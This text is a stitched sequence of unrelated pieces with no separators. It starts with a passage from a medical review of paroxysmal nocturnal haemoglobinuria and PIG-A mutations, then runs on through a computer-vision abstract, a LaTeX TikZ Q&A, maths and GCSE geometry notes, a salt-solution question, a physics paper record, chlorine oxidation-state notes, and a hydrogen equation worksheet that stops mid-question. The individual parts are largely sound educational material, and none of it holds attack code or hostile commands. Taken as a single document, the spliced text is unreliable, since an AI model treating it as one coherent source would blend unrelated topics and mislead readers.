This is another area much influenced by the interplay of PNH and AA. Those with AA or progressive pancytopenia may be candidates for intensive disease modifying treatment, including immunosuppression or bone marrow transplantation. These approaches are usually not appropriate for classic PNH without bone marrow failure. Interesting exceptions to this rule are disease occurring in patients with a syngeneic twin. In this circumstance, there is little risk from transplant, although it appears that at least moderate doses of conditioning chemotherapy before stem cell infusion are necessary to prevent re-expansion of the PNH clone.26
Most patients without pronounced cytopenias simply require supportive management. Blood transfusion is the mainstay for those with symptomatic anaemia. Folate supplementation is mandatory and iron status should be monitored because patients can become iron deficient through urinary loss or iron overloaded from blood. Because thrombosis is a leading cause of mortality in this group, all those with haemolytic disease or a large percentage of PNH cells in their blood (perhaps > 50% PNH neutrophils) should be considered for primary prophylaxis with warfarin if there are no contraindications.20
## THE BIOCHEMICAL AND MOLECULAR BASIS OF PNH
A failure of GPI anchor synthesis is a constant and key feature in all cases of PNH. The genetic basis of this abnormality is now well described, as is the detail of the biochemical consequences.16, 18, 27 GPI deficiency causes a loss of many proteins from the cell surface. The resulting cell phenotype explains the clinical features and suggests a mechanism for expansion of the PNH clone. These assumptions, while reasonable, await further experimental proof and the correlation of all clinical sequelae with specific protein loss has yet to be achieved. Before speculating on this, it is worth describing what we know about the GPI anchor, the missing proteins, and the underlying genetic defect.
### The GPI anchor
Most cell surface proteins are attached via a sequence of hydrophobic amino acids that spans the lipid portion of the bilayer. This transmembrane domain achieves a stable interaction, which is not easily disrupted without destroying the membrane itself. In the 1980s, another method of cellular attachment was described whereby proteins were linked to a GPI molecule, which was itself inserted into the cell membrane.28 The structure and the biosynthesis of this GPI anchor were determined from work in trypanosomes, whose major surface glycoprotein is attached by this mechanism.29 The backbone of the GPI structure is highly conserved between species.
There are essentially three parts to the GPI anchor (fig 2). The membrane attachment is achieved through the insertion of the lipid moiety of phosphatidylinositol (PI) into the outer leaflet of the membrane. There is then a glycan core consisting of a molecule of N-acetylglucosamine (GlcNAc) linked to three mannose residues and then to an ethanolamine. The protein attachment site is to the phosphoethanolamine (PEA) molecule linked to the terminal mannose. The C-terminus of the relevant protein is linked to the amino group of the PEA molecule by an amide bond.18, 30, 31
Figure 2
The glycosyl phosphatidylinositol (GPI) anchor. This is a simplified diagram of the GPI structure. The C-terminus of the anchored protein links to an ethanolamine residue on the GPI anchor. The anchor itself consists of this ethanolamine moiety attached to a glycan core. The GPI structure attaches to the cell membrane via phosphatidylinositol. The glycan core consists of a molecule of GlcNAc linked to three mannose residues. The first step in GPI synthesis is the linkage of the GlcNAc to PI. It is this reaction that fails in paroxysmal nocturnal haemoglobinuria because the genetic lesion disrupts the production of a necessary enzyme complex.
“Glycosyl phosphatidylinositol deficiency causes a loss of many proteins from the cell surface”
Biosynthesis of the GPI moiety occurs in the rough endoplasmic reticulum (ER). The precise location at which each reaction takes place is still a matter of some doubt. Some of the steps take place on the cytoplasmic surface of the ER and some within the cisternal space.32 The first step in the process is the addition of a molecule of GlcNAc to a PI residue. This does take place on the cytoplasmic surface of the ER and, at some point, the developing molecule is flipped to the cisterna. A series of three mannosylations follows using dolichol-phosphate mannose as a donor. Ethanolamine is added to each of these sugars. Transamidation of the newly synthesised protein leads to its attachment to the PEA molecule on the terminal mannose and finally the protein–GPI complex is transported to the external surface of the cell.
### The importance of GPI linkage
The high degree of interspecies conservation of the GPI structure and its wide distribution argues for an important biological role for this mechanism of protein attachment. Most available information comes from work on trypanosomes and animal studies and the relevance to humans is speculative.
Enzymes have been characterised that cleave GPI anchors, thus releasing the tethered proteins.33 These phospholipases are present in other mammals and trypanosomes and their existence suggests that some proteins may be anchored through GPI to allow their selective removal. An example of this is the deliberate cleavage of the major surface protein (variant surface glycoprotein; VSG) of the trypanosome and its replacement with an immunologically discrete variant VSG from its repertoire. This allows the organism to evade the immune response in an infected host.34
Proteins attached through GPI are less tightly bound than their transmembrane counterparts, which allows a degree of transfer from one species (or cell) to another, as has been described in the parasitic infection caused by Schistosoma mansoni. In this case, the parasite seems to acquire host CD55, which in turn helps it to avoid complement mediated immune attack.35
In addition to allowing “loss or gain” of proteins, the biochemical membrane associations and mobility are different for GPI anchors and transmembrane domains. It is possible that the anchor's characteristics and localisation are integral to the normal function of the associated protein.
GPI linked proteins are not randomly distributed over the cell membrane. In polar cells they are frequently located at the apical pole. In all cells, they associate with each other in regions of the membrane that are rich in glycolipids (sphingolipids and cholesterol), in so called glycolipid rafts. The importance of these structures remains unclear.
### The GPI abnormality in PNH
Affected cells in PNH synthesise little or no GPI anchor. This results from a failure in the first step in the synthetic process—the addition of GlcNAc to PI. This has been demonstrated using different techniques by several workers. Biochemical studies using labelled precursors show an almost complete lack of intermediates containing mannose or glucosamine, indicating that the block in the pathway is at this first stage.36 Murine cell lines incapable of synthesising GPI structures have been studied. In these experiments it could be shown that lines in which the defect occurred at different points in the pathway complemented one another (restored the synthesis when fused together). Three lines, classes A, C, and H, were individually unable to add GlcNAc to PI but when fused together they complemented one another.37, 38 This implied that there were at least three gene products controlling this step. When PNH cells from patients are fused with these lines, they always complement cells of classes C and H but never those of class A. Thus, it became clear that the defect in PNH was always the same as that found in class A cells and led to a failure in the first step in GPI synthesis.39 This led to the subsequent discovery and expression cloning of the gene involved, which was termed PIG-A (phosphatidylinositol glycan complementation class A).16 It appears that the product of PIG-A, along with at least three other gene products (PIG-C, PIG-H, and hGP1), form the enzyme complex responsible for the transfer of GlcNAc to PI (R Watanabe et al. In: Proceedings of the International Symposium on Glycosyltransferases and cellular communication, 1997, Osaka, Japan, abstract 6).
### GPI linked proteins in PNH
If no GPI molecule is produced then the unlinked proteins are degraded in the ER and are absent from the cell surface.40 Some can still be expressed in an alternative transmembrane bound form (for example, FcγRIII/CD16 or LFA-3/CD58), but whether they retain the same function is not clear.41, 42 A further complicating factor in the analysis of surface phenotype in PNH is that some patients can synthesise small quantities of GPI anchor and there appears to be competition between proteins for this residue, leading to partial expression of certain molecules and complete absence of others. This is best observed in red blood cells that are divided into three types on this basis by flow cytometry.43 Type I are normal in their surface expression, type II show reduced but detectable amounts of GPI linked proteins, and type III are completely deficient. Patients with florid haemolysis usually have a large proportion of type III cells, whereas those with non-haemolytic PNH in association with overt aplasia may have either type II cells or small type III clones.24 Type II cells probably arise in patients with PIG-A mutations that allow a small amount of residual protein to be produced—for example, some missense point mutations.44
A wide range of proteins use the GPI linkage mechanism for cell surface attachment. There is no obvious similarity between them, belonging as they do to different functional groups. They include complement defence proteins, enzymes, blood group antigens, adhesion molecules, cell receptors, and others of unknown function.27, 45 If the proteins are normally expressed on haemopoietic cell lineages then they are absent in the cells of the PNH clone. Table 1 illustrates the diversity of proteins that have been described, although it is by no means exhaustive.
Table 1
The range of glycosyl phosphatidylinositol (GPI) linked proteins
“The high degree of interspecies conservation of the glycosyl phosphatidylinositol structure and its wide distribution argues for an important biological role for this mechanism of protein attachment”
### The PIG-A gene
In 1993, Miyata et al described the expression cloning of the PIG-A gene by the correction of a GPI deficient murine cell line, which had a similar GPI biosynthetic defect to that observed in PNH.16 The PIG-A gene is somatically mutated in all cases of PNH, presumably because it is the only gene of the GPI biosynthetic pathway that is found on the X chromosome at Xp22.1.17, 49 This means that a single mutation of the gene on the active X chromosome of a haemopoietic stem cell in women or the only X chromosome in men, will result in the PNH phenotype. The PIG-A gene consists of six exons spanning 17 kb of genomic DNA. It has an open reading frame of 1452 bp encoding a protein of 484 amino acids.17, 49 There is a short 5′ non-coding region with the initiation of transcription in exon 2 and a relatively large 3′ non-coding region. The PIG-A promoter sequences are characteristic of a housekeeping gene, which presumably reflects the widespread expression of GPI linked proteins in all cell types.
### PIG-A mutations in PNH
Because the mutations are somatic in PNH, they are extremely varied, with very few reported more than once.39, 45, 50–63 Approximately two thirds are small insertions or deletions resulting in a frameshift and early termination of transcription. In this circumstance, no active PIG-A product is produced and the PNH cells are completely deficient in all GPI linked proteins. The remainder are point mutations and these may result in a complete or partial deficiency of GPI linked proteins. More than 100 PIG-A mutations have now been described and very few are repeated (fig 3).
Figure 3
The PIG-A gene. (A) The genomic structure of the PIG-A locus. The promoter sequences of the PIG-A gene are depicted in greater detail and consist of four CAAT boxes, two AP-2 sequences, and a CRE (cAMP response element) sequence. These features are consistent with the ubiquitous expression of PIG-A. (B) The coding region of PIG-A. The reported point mutations are depicted by the arrows: the open arrows indicate missense mutation, the solid arrows are nonsense mutations, and the hatched arrows are at the site of a polymorphism that does not affect the code and has been reported in normal individuals. Codons 48 and 128 are affected by several different point mutations, indicating that these are potentially crucial areas of the PIG-A protein. The solid bar demonstrates the region of homology between PIG-A and several other glycosyltransferases, suggesting that it may be the binding site for N-acetylglucosamine. One point mutation has been reported in this domain which resulted in a relatively neutral amino acid substitution (asparagine to aspartic acid) and a partial deficiency of glycosyl phosphatidylinositol linked antigens in this patient.
In over half of affected patients, flow cytometric analysis of the red blood cells identifies two discrete populations of PNH cells (type III, with complete deficiency; and type II, with partial deficiency of GPI linked antigens). This indicates that there are at least two unrelated PNH clones in these patients. Several groups have now described patients with more than one PNH clone at a molecular level; in fact, as many as four separate GPI deficient clones with different PIG-A mutations have been identified in a single patient.64 In most cases, the individual clones occur at the same time, but one patient was studied before and many years after a bone marrow transplant, at the time of relapse, and the PIG-A mutations at relapse were different to those of the original disease.65 In many of the cases with more than one mutated clone, red blood cell flow cytometry only identifies a single PNH population. Thus, it appears that most patients have multiple PNH clones. This indicates that patients are permissive for the development and/or expansion of PNH clones and therefore suggests a factor extrinsic to the PNH clone(s) that favours their development.
### Is a PIG-A deficient clone sufficient to result in PNH?
The PIG-A gene is essential for embryogenesis and therefore mice that have “knocked out” PIG-A genes are not viable. When PIG-A deficient embryonic stem cells are microinjected into murine blastocysts, chimaeric mice are occasionally produced but only have a small number of cells derived from the PIG-A negative embryonic stem cells.66, 67 The deficient stem cells contribute to the haemopoietic compartment of the resulting chimaeric mice but their proportion in any individual mouse remains constant with time. In addition, when mice are produced with higher proportions of GPI deficient haemopoietic cells, by using the Cre-Lox P system and/or by transplantation experiments, the proportion of GPI deficient haemopoietic cells remains constant over time.68 These findings show that PNH cells do not have a growth advantage over their normal counterparts in mice without bone marrow failure.
“The cause of the most intriguing feature of paroxysmal nocturnal haemoglobinuria clones—their relative growth advantage in a damaged bone marrow—remains obscure”
Araten and his colleagues recently reported the presence of rare GPI deficient neutrophils in normal individuals.69 These cells have a frequency of 10–51/million cells and when collected by flow sorting were shown to contain mutations of the PIG-A gene. These findings show that such mutations exist frequently among normal individuals, but this alone is not sufficient for the development of PNH.
## SUMMARY: THE DEVELOPMENT OF PNH
We may now put forward a general outline of the factors leading to PNH and of its interplay with aplasia. The dual pathogenesis model appears to withstand the rigours of both time and experimental research. In this hypothesis, somatic mutations in PIG-A lead to PNH only if the affected cells are in a bone marrow under hypoplastic stress. The mutation and the abnormal bone marrow environment are both required. PNH cells possess only a relative growth advantage and will not prosper in a normal bone marrow.
### Take home messages
• It appears that the development of paroxysmal nocturnal haemoglobinuria (PNH) requires two coincident factors: somatic mutation of the PIG-A gene and a hypoplastic bone marrow environment
• The gene mutation results in failure of synthesis of the glycosyl phosphatidylinositol (GPI) anchor, without which many proteins are unable to attach to cell surfaces
• It is thought that these alterations in surface antigen composition give the PNH cells a relative growth advantage in a hypoplastic marrow, although the precise pathophysiological mechanisms are unclear
• The failure of GPI production results in the loss of complement defence proteins from red blood cells, which explains the classic feature of intravascular complement mediated haemolysis
• There is indirect evidence that platelet activation with consequent thrombosis is caused by a similar mechanism
If this is correct, then certain observations would be expected. Hypoplasia should be found invariably. This clinical association has of course been long recognised. Some degree of single or multiple cytopenia can be found in up to 80% of cases and in others there is laboratory evidence of diminished progenitor growth potential.20, 70 It appears then, that hypoplasia and PNH do indeed go hand in hand. For dual pathogenesis, one would require PIG-A mutations to be frequent in normal individuals; otherwise the coincidence of such an occurrence in the rare disease of aplasia would be extraordinary. This was in fact suspected from the presence of multiple, separate mutations in certain patients with PNH and has now been confirmed by observations from several authors.70, 71 So it appears that the concept of dual pathogenesis accounts for the observed facts.
The mechanism by which aplasia imparts a relative growth advantage to PNH cells is more speculative. Although few doubt the immune component in aplasia, it is unclear whether this is a primary alteration in the stem cell pool against which an immune response develops or an autoreactive state, where otherwise normal stem cells are targeted. In either scenario, the PNH cells may prosper by evading the immune destruction. This could be mediated directly by loss of a GPI linked “recognition molecule” or occur through altered biology or localisation of the cells through GPI linked mechanisms. The answers to these questions will not only enlighten PNH research but may greatly enhance our understanding of aplasia and stem cell behaviour.
# From bits to images: Inversion of local binary descriptors
### Abstract
Local Binary Descriptors (LBDs, such as BRIEF and FREAK) have become very popular for image matching tasks, especially when going mobile. While they are extensively studied in this context, their ability to carry enough information in order to infer the original image is seldom addressed. In this work, we leverage an inverse problem approach to show that it is possible to directly reconstruct the image content from LBDs. This process relies on very broad assumptions besides the knowledge of the pattern of the descriptor at hand. This generalizes previous results that required either a prior learning database or non-binarized features. Furthermore, our reconstruction scheme reveals differences in the way different LBDs capture and encode image information. Hence, the potential applications of our work are multiple, ranging from privacy issues caused by eavesdropping image keypoints streamed by mobile devices to the design of better descriptors through the visualization and the analysis of their geometric content.
Published in IEEE Transactions on Pattern Analysis and Machine Intelligence, vol. 36, no. 5, May 2014.
# Margins around Tikz frame
I'm working on the graphic part of a document that I need to fill with text. In particular, I need a header at the top for some general information, with the document text simply boxed.
Depending on how verbose the text is, the document can be one page or several. In the latter case, starting from page 2, I no longer want the header, only the boxed text.
I tried to figure out how to obtain the boxed text and discovered TikZ. But I have some problems defining the margins of the box, and with the text behaviour on the pages after the first. The top margin seems to disappear, and I don't understand why. I tried many solutions, using \fbox or \trimbox{} and \adjustbox, but I haven't found one yet.
Secondly, I can't make the header disappear after the first page. I tried \clearpage and \thispagestyle{empty}, but they remove the margins and page numbering as well.
Here is an MWE to show what I have done so far:
\documentclass[a4paper]{article}
\usepackage[all]{background}
\usepackage{tikz}
\usetikzlibrary{calc}
\usepackage{lipsum}
\usepackage[sfdefault, light]{roboto}
\usepackage{geometry}
\geometry{left=80pt, right=80pt, top=65pt}
\usepackage[T1]{fontenc}
\usepackage[utf8]{inputenc}
\usepackage{lastpage}
\usepackage{fancyhdr}
\pagestyle{fancy}
\cfoot{\footnotesize Page \thepage\ of \pageref{LastPage}}
\chead{{\large \textsc{My Name IS}}\\ \vspace{3pt} {\small My Work IS -- My Specialisation IS}\\ My Cell. IS -- My ID IS}
\usepackage{lettrine}
\usepackage{fix-cm}
\usepackage{adjustbox}% provides \trimbox
\newcommand{\Frame}{
\trimbox{10cm 10cm 10cm 5cm}{
\begin{tikzpicture}[every node/.style={inner sep=10,outer sep=10},overlay, remember picture]
\draw [line width=1mm]
($(current page.north west) + (1cm,-3cm)$)
rectangle
($(current page.south east) + (-1cm,1cm)$);
\end{tikzpicture}
}
}
\SetBgContents{\Frame}
\SetBgOpacity{100}
\SetBgColor{black}
\SetBgAngle{0}
\SetBgScale{1}
\begin{document}
\vspace*{50pt}
\lipsum[1-19]
\end{document}
Thank you for your time and help! R.
• see tcolorbox package, maybe can help you – Zarko Jul 30 '17 at 18:34
• regarding making the headers disappear, try putting \pagestyle{empty} right in the file, and after the pages with tikz content are safely finished, probably after a \newpage, add \pagestyle{headers} to restore them. (not tested.) – barbara beeton Jul 30 '17 at 19:12
• You realize the 65pt is less then 3cm. Or did you mean 1cm? – John Kormylo Jul 30 '17 at 20:47
• @Zarko thank you for your answer. I'm gonna have a look at tcolorbox and try to make it useful for my needs. @barbarabeeton thank you for your answer. I tried putting \pagestyle{empty} but after a new page the style comes back. @JohnKormylo thank you for your answer. If I understood well, you mean that the border of the top frame is lower than the other three isn't it? It's exactly what I want. – Dawson Jul 31 '17 at 7:20
I prefer to use everypage with tikzpagenodes for headers etc.
\documentclass[a4paper]{article}
\usepackage[all]{background}
\usepackage{tikzpagenodes}
\usetikzlibrary{calc}
\usepackage{lipsum}
%\usepackage[sfdefault, light]{roboto}
\usepackage{geometry}
\geometry{left=80pt, right=80pt, top=65pt}
%\usepackage[T1]{fontenc}
%\usepackage[utf8]{inputenc}
\usepackage{lastpage}
\usepackage{lettrine}
\usepackage{fix-cm}
\pagestyle{empty}
\usepackage{everypage}
\AddEverypageHook{%
\ifnum\value{page}=1
\begin{tikzpicture}[every node/.style={inner sep=0pt},overlay, remember picture]
\node[above] at (current page footer area.south) {\footnotesize Page \thepage\ of \pageref{LastPage}};
\node[below] at (current page header area.north)
{\begin{tabular}{c}
{\large \textsc{My Name IS}}\\[3pt]
{\small My Work IS -- My Specialisation IS}\\
My Cell. IS -- My ID IS
\end{tabular}};
\end{tikzpicture}%
\else
\begin{tikzpicture}[overlay, remember picture]
\node[above] at (current page footer area.south) {\footnotesize Page \thepage\ of \pageref{LastPage}};
\draw [line width=1mm]
($(current page.north west) + (1cm,-1cm)$)
rectangle
($(current page.south east) + (-1cm,1cm)$);
\end{tikzpicture}%
\fi}
\begin{document}
\vspace*{50pt}
\lipsum[1-19]
\end{document}
• Dear @JohnKormylo, thank you for your answer! It works perfectly using an if-then-else construct. There's just one problem, which I think is related to the 65pt question you asked me before. I want the TikZ border on the first page, and only the first, to start lower, because I need to insert My Data IS, etc. In your excellent solution there isn't any TikZ border on the first page. Anyway, I studied the code you proposed and found a solution by inserting the \draw code with (1cm,-3cm) for the first page as well, and it works! Thank you very much! R. – Dawson Jul 31 '17 at 7:28
• How do I insert an image in a comment? I would show the final result, for future reference. ibb.co/bu5wS5 – Dawson Jul 31 '17 at 7:34
## Functions Modeling Change: A Preparation for Calculus, 5th Edition
$\frac{3}{2}$
We know that $\log_ab=c\Leftrightarrow a^c=b$ and $\ln b=c\Leftrightarrow e^c=b$. Also, $\log_a a^x=x$ and $\log_a b^x=x\log_a b$. Hence here: $\log\sqrt{1000}=\log{(10^3)^{\frac{1}{2}}}=\log{10^{\frac{3}{2}}}=\frac{3}{2}\log10=\frac{3}{2}\cdot1=\frac{3}{2}$
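As a quick numerical sanity check (a minimal Python sketch, not part of the textbook solution), the result can be verified with the standard library:

```python
import math

# Verify the worked answer: log10(sqrt(1000)) should equal 3/2.
value = math.log10(math.sqrt(1000))
assert math.isclose(value, 1.5)
print(value)  # 1.5 (up to floating-point rounding)
```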
# GCSE revision: area and perimeter

The word perimeter means 'a path that surrounds an area'. It comes from the Greek words peri, meaning around, and metre, meaning measure; its first recorded usage was during the 15th century. The perimeter of a shape is the distance around the outside. It is a length, so it is measured in mm, cm, m, km or any other unit of length. The area of a 2D shape is the amount of space it takes up in two dimensions, and its units are always squared, e.g. $\text{cm}^2$, $\text{m}^2$. You need to know the formulas for the areas of some common shapes, be able to rearrange them, and be able to deal with compound shapes.

Matching quiz (match each question to its answer):

- What is perimeter? The length around a shape.
- What is area? The number of squares inside a shape.
- What is surface area? The area of all the surfaces of a 3-D shape.
- What is volume? The number of cubes that fit inside a shape.

Worked examples:

1. The total distance around the edge of one equilateral triangle is 12 cm, so each side is 4 cm.
2. A rectangle has a perimeter of 84 cm and a length of 24 cm. Since $P = 2(l + w)$, its width is $84/2 - 24 = 18$ cm.
3. ABC is a triangle with $AB = 8$ cm, $BC = 6$ cm and a right angle at $B$. By Pythagoras, $AC = \sqrt{8^2 + 6^2} = 10$ cm, so the perimeter of triangle ABC is $8 + 6 + 10 = 24$ cm.
4. A shape consists of a region of area 32 m² plus a semicircle of radius 2 m. The area of the semicircle is $\frac{1}{2} \times \pi \times 2^2 = 6.283\ldots$ m², so the total area is $32 + 6.283\ldots = 38.3$ m² (to 3 significant figures).

A typical applied question: Peter decides to cover the floor of a room with a striped carpet, sold from a roll that is 3 m wide. Area, perimeter and volume questions of this kind come up regularly in GCSE (grades 1 to 3) and Edexcel Functional Skills exam papers.
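The worked examples above (the rectangle's width, the right-angled triangle's perimeter, and the semicircle's total area) can be checked with a short Python sketch; all numbers are taken directly from the text:

```python
import math

# Rectangle: perimeter 84 cm, length 24 cm. P = 2(l + w)  =>  w = P/2 - l.
width = 84 / 2 - 24  # 18.0 cm

# Right-angled triangle ABC: AB = 8 cm, BC = 6 cm, right angle at B.
ac = math.hypot(8, 6)   # hypotenuse AC = 10.0 cm, by Pythagoras
perimeter = 8 + 6 + ac  # 24.0 cm

# Shape of area 32 m^2 topped by a semicircle of radius 2 m.
total_area = 32 + 0.5 * math.pi * 2 ** 2

print(width, perimeter, round(total_area, 1))  # 18.0 24.0 38.3
```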
# How much salt to dissolve in water for a noticeable change in volume?
I am reading through this High School science lab about how dissolving salt changes the volume of water:
• Place 300 to 400 g of salt in the flask (1L)
• Pour in enough water to cover the dry salt, and swirl the water around in the flask to wet the salt and let air bubbles float up to the top. (This will not be enough water to dissolve more than a little of the salt; students will still see a lot of salt crystals.)
• As soon as the air bubbles seem to have gone, fill the flask to the mark with water.
• Label the water level clearly, with an OHP pen or some other marker. Point out that most of the salt is still there, as a solid unable to dissolve.
• Shake the flask to hurry the dissolving until as much salt as will dissolve has done so.
• Point out the consequent small contraction. Ask students why they think this has happened.
If I remember Chemistry class from ages ago, salt is ionic so it can dissolve in water, which is itself polar: $$\mathrm{NaCl} \stackrel{\mathrm{H_2O}}{\longrightarrow} \mathrm{Na}^+ + \mathrm{Cl}^-$$ The water and the dissolved salt together can pack more tightly than water by itself.
Reading the lab more closely, 300 g of salt is just over one cup, so you have to add a substantial amount of salt to see this decrease in volume. How large is the contraction, and how might one compute it?
• sorry... room temperature, atmospheric pressure, etc. Salt and water may exhibit other interactions in extraordinary conditions. – john mangual Apr 15 '16 at 19:11
• Note that at 20 C the solubility of NaCl is only 36 g/100 g of water. – Gert Apr 15 '16 at 21:58
• The volume actually decreases. reddit.com/r/askscience/comments/3snwse/… – Farcher Apr 16 '16 at 7:05
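A back-of-the-envelope way to compute the contraction is to compare the volume of the separate components with the volume of the resulting brine. The sketch below does this in Python; the densities and the solubility figure are approximate literature values at 20 °C and atmospheric pressure, and are the key assumptions here:

```python
# Rough estimate of the volume contraction when NaCl dissolves in water.
# Assumed literature values at ~20 C: solid NaCl and water densities,
# saturated-brine density, and solubility of ~36 g NaCl per 100 g water.
rho_salt = 2.165    # g/mL, solid NaCl
rho_water = 0.998   # g/mL
rho_brine = 1.197   # g/mL, saturated NaCl solution

m_water = 100.0     # g
m_salt = 36.0       # g, saturated at 20 C

v_separate = m_water / rho_water + m_salt / rho_salt
v_solution = (m_water + m_salt) / rho_brine
contraction = v_separate - v_solution

print(f"separate: {v_separate:.1f} mL, dissolved: {v_solution:.1f} mL")
print(f"contraction: {contraction:.1f} mL ({100 * contraction / v_separate:.1f}%)")
```

With these figures the contraction comes out to roughly 3 mL per 100 g of water, i.e. a few per cent — small, but noticeable against the mark on a 1 L flask.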
Non-diagonal reflection for the non-critical XXZ model
Research output: Contribution to journal › Article › peer-review
1 Citation (Scopus)
Abstract
The most general physical boundary $S$-matrix for the open XXZ spin chain in the non-critical regime ($\cosh (\eta)>1$) is derived starting from the bare Bethe ansatz equations. The boundary $S$-matrix, as expected, is expressed in terms of $\Gamma_q$-functions. In the isotropic limit the corresponding results for the open XXX chain are also reproduced.
Original language: English
Article number: 194007
Journal: Journal of Physics A: Mathematical and Theoretical
Volume: 41
Issue: 19
DOI: https://doi.org/10.1088/1751-8113/41/19/194007
Publication status: Published - 16 May 2008
Keywords
• hep-th
• cond-mat.stat-mech
• math-ph
• math.MP
• nlin.SI
# Oxidation states of chlorine in KCl and its oxo-salts

The oxidation number (oxidation state) of an atom in a molecule or ion is assigned by:

i) summing the fixed oxidation states of the other atoms in the species, and
ii) equating the total oxidation state of the molecule or ion to its net charge.

In a homonuclear molecule such as Cl2 every atom has oxidation state zero, and free elements are always zero. In hetero-diatomic molecules the bonding electrons are counted as belonging to the more electronegative atom, which therefore takes the negative oxidation state.

KCl is a neutral ionic compound of K⁺ and Cl⁻ ions. Potassium, a group 1 element, is +1, so chlorine must be -1: (+1) + x = 0 gives x = -1. This agrees with the general rule that a group 17 element in a binary compound is -1 (as in HCl and NaCl). Likewise, in FeCl3 each chlorine is -1, so iron is +3.

In the chlorate ion, ClO3⁻, the three oxygens contribute 3 × (-2) = -6 and the ion carries a 1- charge, so chlorine is +5: x + (-6) = -1. The same result follows for potassium chlorate, KClO3, from (+1) + x + 3(-2) = 0. In potassium perchlorate, KClO4, chlorine is +7: (+1) + x + 4(-2) = 0. The ratio of the oxidation states of Cl in KCl to that in KClO3 is therefore (-1)/(+5) = -1/5.

The oxides of chlorine follow the same arithmetic:

- Cl2O: 2x + (-2) = 0, so x = +1
- Cl2O5: 2x + 5(-2) = 0, so x = +5
- Cl2O7: 2x + 7(-2) = 0, so x = +7

Chlorine thus shows the oxidation numbers -1, 0, +1, +3, +4, +5 and +7 depending on the compound; the most common are -1 (as in HCl and NaCl) and 0 (as in Cl2). In the decomposition KClO2 → KCl + O2, potassium stays at +1 throughout, chlorine falls from +3 to -1 (it is reduced) and oxygen rises from -2 to 0 (it is oxidized), so the reaction is an internal redox change.

The same method applies to other ions: in permanganate, MnO4⁻, manganese is +7 (x + 4(-2) = -1), and in dichromate, Cr2O7²⁻, chromium is +6 (2x + 7(-2) = -2).

When the same element occupies inequivalent positions in a species, the method gives only an average, which may be fractional:

- In Fe3O4 (a mixture of FeO and Fe2O3) one iron is +2 and two are +3, an average of 8/3.
- In the tetrathionate ion, S4O6²⁻, the two bridging sulphur atoms (bonded only to other sulphur atoms) are in the zero state, so the four sulphur atoms total +10 and average 10/4 = 2.5.
- In potassium superoxide, KO2, the two oxygen atoms together carry -1, an average of -1/2 each.
- In the cyclopentadienide ion, C5H5⁻, the five carbons share the extra electron by resonance, giving each an average state of -6/5.
- Bleaching powder, CaOCl2, contains chlorine in two oxidation states at once: -1 (chloride) and +1 (hypochlorite).

Note also that successive changes of charge become progressively harder: the larger the positive charge already on a species, the more difficult it is to remove a further electron, and the addition of an electron likewise becomes more difficult with increasing negative charge.
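The assignment rule above (sum the known oxidation states, then equate the total to the net charge) can be sketched in a few lines of Python. The `oxidation_state` helper and its table of fixed states are illustrative choices, not from the source; the arithmetic is the one described above.

```python
# Solve for one unknown oxidation state: the sum of all states must equal the net charge.
# Fixed states assumed here: K = +1, O = -2, H = +1 (the usual rules for these compounds).
FIXED = {"K": +1, "O": -2, "H": +1}

def oxidation_state(counts, charge=0, unknown="Cl"):
    """counts: element -> number of atoms; returns the state of the `unknown` element."""
    known = sum(FIXED[el] * n for el, n in counts.items() if el != unknown)
    return (charge - known) / counts[unknown]

print(oxidation_state({"K": 1, "Cl": 1}))                         # KCl    -> -1.0
print(oxidation_state({"K": 1, "Cl": 1, "O": 3}))                 # KClO3  -> 5.0
print(oxidation_state({"K": 1, "Cl": 1, "O": 4}))                 # KClO4  -> 7.0
print(oxidation_state({"Cl": 2, "O": 7}))                         # Cl2O7  -> 7.0
print(oxidation_state({"Mn": 1, "O": 4}, charge=-1, unknown="Mn"))  # MnO4- -> 7.0
```

A fractional result (as for Fe in Fe3O4 or S in tetrathionate) is the signal that the element occupies inequivalent positions and only an average is being reported.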
# Viraf J. Dalal solutions for Class 9 Simplified ICSE Chemistry chapter 6 - Study Of The First Element — Hydrogen [Latest edition]
## Chapter 6: Study Of The First Element — Hydrogen
Equation Worksheet
### Viraf J. Dalal solutions for Class 9 Simplified ICSE Chemistry Chapter 6 Study Of The First Element — Hydrogen: Equation Worksheet
Equation Worksheet | Q 1.01
Complete and balance the equation:
[General method]
Reactions of active metals - cold water
Potassium- K + H2O → ______+ _______ [g]
Equation Worksheet | Q 1.02
Complete and balance the equation:
[General method]
Reactions of active metals - cold water
Sodium - 2Na + 2H2O → ______+ _______ [g]
Equation Worksheet | Q 1.03
Complete and balance the equation:
[General method]
Reactions of active metals - cold water
Calcium - Ca + H2O → ______+ _______ [g]
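Once the blanks in these cold-water equations are filled (for example 2K + 2H2O → 2KOH + H2), a completed equation can be checked by counting atoms of each element on both sides. A minimal sketch, assuming simple formulas without brackets (so Ca(OH)2 is written CaO2H2 here):

```python
import re
from collections import Counter

def atoms(formula, coeff=1):
    """Count atoms in a simple formula like 'H2O' or 'KOH' (no brackets)."""
    c = Counter()
    for el, n in re.findall(r"([A-Z][a-z]?)(\d*)", formula):
        c[el] += coeff * (int(n) if n else 1)
    return c

def balanced(lhs, rhs):
    """lhs/rhs: lists of (coefficient, formula) pairs; True if every element balances."""
    total = lambda side: sum((atoms(f, k) for k, f in side), Counter())
    return total(lhs) == total(rhs)

# 2K + 2H2O -> 2KOH + H2 (potassium with cold water)
print(balanced([(2, "K"), (2, "H2O")], [(2, "KOH"), (1, "H2")]))        # True
# Ca + 2H2O -> Ca(OH)2 + H2, with the hydroxide written as CaO2H2
print(balanced([(1, "Ca"), (2, "H2O")], [(1, "CaO2H2"), (1, "H2")]))    # True
```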
Equation Worksheet | Q 1.04
Complete and balance the equation:
[General method]
Reactions of metals with steam
Magnesium - Mg + H2O → ______+ _______ [g]
Equation Worksheet | Q 1.05
Complete and balance the equation:
[General method]
Reactions of metals with steam
Aluminium - 2Al + 3H2O → ______+ _______ [g]
Equation Worksheet | Q 1.06
Complete and balance the equation:
[General method]
Reactions of metals with steam
Zinc - Zn + H2O → ______+ _______ [g]
Equation Worksheet | Q 1.07
Complete and balance the equation:
[General method]
Reactions of metals with steam
Iron - 3Fe + 4H2O ⇌ ______+ _______ [g]
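The magnetic oxide produced in the reversible iron-steam reaction, Fe3O4, holds iron in two oxidation states at once: the average works out to the fraction 8/3, which resolves into one Fe at +2 and two at +3. A quick arithmetic check (taking O as -2, the usual assumption for an oxide):

```python
# Average oxidation state of Fe in the neutral oxide Fe3O4, taking O as -2.
n_fe, n_o = 3, 4
avg_fe = (0 - n_o * (-2)) / n_fe   # a fraction, not a whole number

# The fraction resolves as one FeO unit (+2) plus one Fe2O3 unit (2 atoms at +3):
resolved = (1 * 2 + 2 * 3) / n_fe

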